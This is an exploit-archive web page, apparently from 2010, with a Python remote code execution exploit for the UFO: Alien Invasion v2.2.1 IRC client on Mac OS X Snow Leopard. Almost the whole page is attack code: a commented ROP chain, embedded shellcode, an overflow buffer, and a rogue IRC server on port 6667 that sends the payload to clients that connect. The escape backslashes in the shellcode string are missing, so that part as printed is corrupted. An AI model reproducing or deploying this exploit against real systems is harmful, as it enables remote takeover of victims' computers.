UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution
Posted on 08 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================================== UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard (ROP) ============================================================================== #!/usr/bin/python # UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX # OS X Snow Leopard: d1dn0t # OS X Leopard: dookie # Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013 import sys, socket, struct WRITEABLE = 0x8fe66448 STRCPY=0x8fe2db10 shellcode = ("xdbxc3xd9x74x24xf4xbbxf3xbdx8dx7cx33xc9x5dxb1" "x27x31x5dx18x03x5dx18x83xc5xf7x5fx78x4dx37x06" "xd3xeexe7x79x84xbcxb7x1bxe9xc1xb8x59x8fxc1xc6" "x5dxf9x04x94x0fxabxe0x18xb2x5axadx91x51x36x5d" "xf2xc3x95xedx9cx26x99x7cx3bxebxccxd2x73x61x3c" "x52x01x28xecx01xb3x86xa0xb8xf6xa7xb3x90x81x6f" "x02xc2x12x84x64xb7x47x0cx34x87x3dx7fx3ax95x82" "xfcxc0x59x71xf2x06x9ex29xa4x38x4ex79x7fx74xee" "xe9x10xbaxc2x7cx18x73x5exb3x9axf0xa5x4bxefxe1" "x68x8bx5fx66xa4x24x13x1exd2x15xb1xb7x4cxe0xd6" "x18xc1xa1x48x29xdax88xe9x78xddx42x63x99x8dx32" "x20x0ex7ex02xc1x63xfex53x0ex2bxafxd3x43x4cx45") # ==================== Put stack pointer into EAX/EDX ==================== ROP = struct.pack('<I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the writeable value below ROP += struct.pack('<I',WRITEABLE) # Required Writeable address here for exploit to work ROP += struct.pack('<I',0x8fe2fb63) # pop eax # ret ROP += struct.pack('<I',WRITEABLE) # Pop writeable address into eax for instructions below ROP += struct.pack('<I',0x8fe2fb58) # push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret # ==================== Jump Over Parameters below ==================== ROP += struct.pack('<I',0xffff1d6b) # add esp,byte +0x1c # pop ebp # ret # ==================== strcpy call ==================== ROP += struct.pack('<I',STRCPY) # use strcpy to copy shellcode from stack to heap ROP += struct.pack('<I',0x8fe2dfd1) # POP - POP - RET over strcpy params ROP += struct.pack('<I',WRITEABLE) # Dst Param for strcpy ROP += 'EEEE' # Src Param for strcpy ROP += struct.pack('<I',WRITEABLE) # Move execution to where we moved our shell ROP += 'C'*12 # Padding # ==================== Craft Parameter 2 ==================== # Need to inc EAX or EDX to point to shell code # Store 0x40 in ECX ROP += struct.pack('<I',0x8fe2dae4) # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret ROP += struct.pack('<I',0x8fe2b3d4) # POP - RET Insturction - Pop's over the value below ROP += struct.pack('<I',0xffffffff) # Value to store in ecx ROP += struct.pack('<I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('<I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret # Replace stack pointer back into eax as it was trashed ROP += struct.pack('<I',0x8fe2c71d) # mov eax,edx # ret # Add offset to paramter ROP += struct.pack('<I',0x8fe2def4) # add eax,ecx # ret # Swap over so we can work on fresh copy of saved ESP ROP += struct.pack('<I',0x8fe0e32d) # xchg eax,edx # Double ECX a few more times to point to our nop sled/shell code ROP += struct.pack('<I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('<I',0x8fe0c0c7) # inc ecx # xor al,0xc9 ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret ROP += struct.pack('<I',0x8fe24b3c) # add ecx,ecx # ret # Add offset to shellcode ROP += struct.pack('<I',0x8fe2def4) # add eax,ecx # ret # Swap back ROP += struct.pack('<I',0x8fe0e32d) # xchg eax,edx # Copy parameter to placeholder ROP += struct.pack('<I',0x8fe2fb61) # mov [eax],edx # pop eax # ret ROP += 'G'*4 # junk # ==================== Call strcpy function ==================== # Set our Stack pointer back to original value ROP += struct.pack('<I',0x8fe0e32d) # xchg eax,edx ROP += struct.pack('<I',0x8fe2daea) # sub eax,ecx # ret # Return execution to our strdup call above ROP += struct.pack('<I',0x8fe0b1c2) # xchg eax,ebp # inc ebp # ret ROP += struct.pack('<I',0x8fe2b6a5) # dec ebp # ret ROP += struct.pack('<I',0xffff01f3) # mov esp,ebp # pop ebp # ret ROP += 'G'*4 # junk # ==================== Call Exploit code from heap ==================== sploit = "001 :" sploit += "x41" * 528 sploit += ROP sploit += 'x90' * 10 sploit += shellcode sploit += "x0dx0a" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', 6667)) s.listen(1) print ("[*] Listening on port 6667.") print ("[*] Have someone connect to you.") print ("[*] Type [control]-c to exit.") conn, addr = s.accept() print '[*] Received connection from: ', addr conn.send(sploit) conn.close # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-08]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
